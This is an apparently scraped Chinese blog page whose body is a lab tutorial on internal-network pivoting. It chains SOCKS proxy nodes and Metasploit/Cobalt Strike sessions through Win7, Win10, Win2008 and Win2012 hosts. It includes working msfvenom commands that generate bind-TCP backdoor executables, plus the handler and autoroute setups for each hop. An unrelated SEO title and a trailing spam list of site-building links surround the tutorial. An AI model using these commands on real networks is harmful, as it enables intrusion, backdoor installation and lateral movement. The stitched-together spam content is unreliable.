当前位置: 首页 > news >正文

进一步加强网站建设2 网站内部链接优化

news 2025/9/18 12:50:58
进一步加强网站建设,2 网站内部链接优化,企业网站设计html,vps网站空间我这里只记录原理,具体操作看文章后半段或者这篇文章内网渗透—代理Socks协议、路由不出网、后渗透通讯、CS-MSF控制上线_内网渗透 代理-CSDN博客 注意这里是解决后渗透通讯问题,之后怎么提权,控制后面再说 背景 只有win7有网,其…

我这里只记录原理,具体操作看文章后半段或者这篇文章内网渗透—代理Socks协议、路由不出网、后渗透通讯、CS-MSF控制上线_内网渗透 代理-CSDN博客

注意这里是解决后渗透通讯问题,之后怎么提权,控制后面再说

背景

只有win7有网,其他没网

网络情况:win7有其他都没有

巧合地是:几台设备入栈规则不严格

代理协议:


SOCKS4/5


代理软件:


SocksCap Proxifier ProxyChains


实现两个目的:


1、通讯后的渗透测试横向移动
2、通讯后的控制上线CS&MSF

win7当作跳板机,端口转发攻击机的流量

win7上线

win7上线省略

VPS建立节点通信win10

MSF需要添加路由转发,CS不需要

添加路由只是MSF可以与WIN10通信,别的渗透工具不可以。所以还需要建立节点,使得渗透工具可以通信  建立节点的目的是接收数据,而前面的路由的目的是建立通讯

节点是在攻击者vps上建立的(准确点是在MSF中建立的节点,而MSF是控制win7的=相当于节点部署在win7上(这里可能理解不正确,暂时认为节点部署在了vps上)),开启vps端口接收数据,然后通过vps上的MSF控制器的路由去渗透内网主机

攻击者通过链接自己的vps进行操作

关键是建立节点

节点建立好之后,攻击者可以使用代理工具访问该节点,通过该节点访问内网主机

win10上线

到这里可以访问win10,然后如果我们拿到了win10的CMD权限,要控制他需要使用CS&MSF。但是win10不出网,而我们此时控制了win7,所以让win7去访问win10

我们需要正向链接,生成本地后门,执行后的权限把数据交给本地2222端口。win7控制器链接当前win10的2222。win7和CS通信,至此可以访问win10

bind_tcp 没有host,因为直接给的本地

(反向后门

后门执行完交给控制器的2222,控制器再监听自己本地的2222)

CS上线win10

使用win10的CMD权限(之前假设取得了此权限,怎么取得的呢?你信息搜集提权等操作取得的)执行后门,并不会上线

需要在win7的会话中访问win10 connect 192.168.11.129 2222即可上线

用192.168.11.128(win7)去控制192.168.11.129(win10)

MSF上线win10

正向链接

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > 2003.exe

监听

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.11.129   ##目标地址
set lport 3333
run

session会话

VPS建立节点通信win2008

win10建立节点链接win2008

CS建立节点

攻击者本地使用代理工具链接该地址192.168.22.131

MSF建立节点

选择会话2

建立路由

run autoroute -p
run post/multi/manage/autoroute
 

节点要和上面的节点的端口号不要相同

use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 2233
run

 攻击者本地使用代理工具链接该地址192.168.22.131

win2008上线

CS上线

创建新的监听器 设置一个正向连接,如果使用反向连接,木马上线后,由于无法和攻击机连接,所以就会导致上线失败,而这里使用正向连接,

生成3331的后门

将生成的木马放在win2008,运行木马。此时还是不会上线,和win10上线一样。

通过win10访问192.168.22.131 3331

MSF上线

生成正向链接木马

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > 2008.exe

监听

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.22.131   ##目标地址
set lport 3333
run

win2012上线

CS上线

cs建立节点

然后探测资产信息,提权,正向链接

上线

建立监听,正向链接

生成后门,将后门放入win2012,执行后门

需要在win2008的会话中访问win2012 connect 192.168.33.130 4444即可上线

MSF上线

以下操作同上,所以直接复制上面的图片下来了

MSF建立节点

选择会话3

建立路由

run autoroute -p
run post/multi/manage/autoroute

 节点要和上面的节点的端口号不要相同

use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 3344
run

 攻击者本地使用代理工具链接该地址192.168.33.130

上线

生成正向链接木马

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > 2012.exe

监听

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.33.129   ##目标地址
set lport 4444
run

入栈严格怎么办?

反向链接:

总结

http://www.yayakq.cn/news/237180/

相关文章:

  • 公共资源交易中心是属于哪个部门佛山百度推广seo服务
  • 网站怎么实现两种语言设置网站建设
  • 上海建立公司网站wordpress 首页title
  • 重庆云诚度网站建设title 网站建设公司实力
  • 腾讯学生服务器可以做网站吗1920的网站做字体大小
  • 有哪些做壁纸的网站建设一个网站的基本成本
  • 手机怎么注册自己的网站网站编程课程设计心得体会
  • 网站建设推广报价单网站悬浮二维码
  • 河南建设厅八大员查询网站智慧校园管理系统平台
  • 做虚假网站犯法吗软件技术就业岗位
  • 免费php网站有哪些艺术字logo生成器
  • 去年做的电子请帖怎么找原网站自己做的网站发布到网上
  • 十八哥公司网站开发wordpress 主题 2016
  • 网站建设情况的汇报住建局查询系统
  • 网站建设的功能都需要有哪些方面微商城网站建设策划
  • 下载网站cms烟台网站制作哪家好
  • 网站缩略图存哪里好上海网络推广的方法
  • 邯郸制作网站的公司博山网站建设yx718
  • 企业网站seo平台自助无人售货机
  • 网站设计小技巧1核1g可以做几个网站
  • 网站建设个人兼职有没有什么免费网站
  • 做行业网站广告网站百度权重
  • 微商建立网站网站开发设计招聘
  • 网站如何获取用户信任做图网站
  • 建设工程公司采购的网站建设单位招聘信息
  • 展展示型网站开发搜索引擎优化的技巧有哪些
  • 亳州网站开发公司单页网站的域名
  • seo免费优化网站英文网站报价
  • 营销型网站的建设软文oa办公系统下载安装
  • 网站运营面试问题一键免费开网店app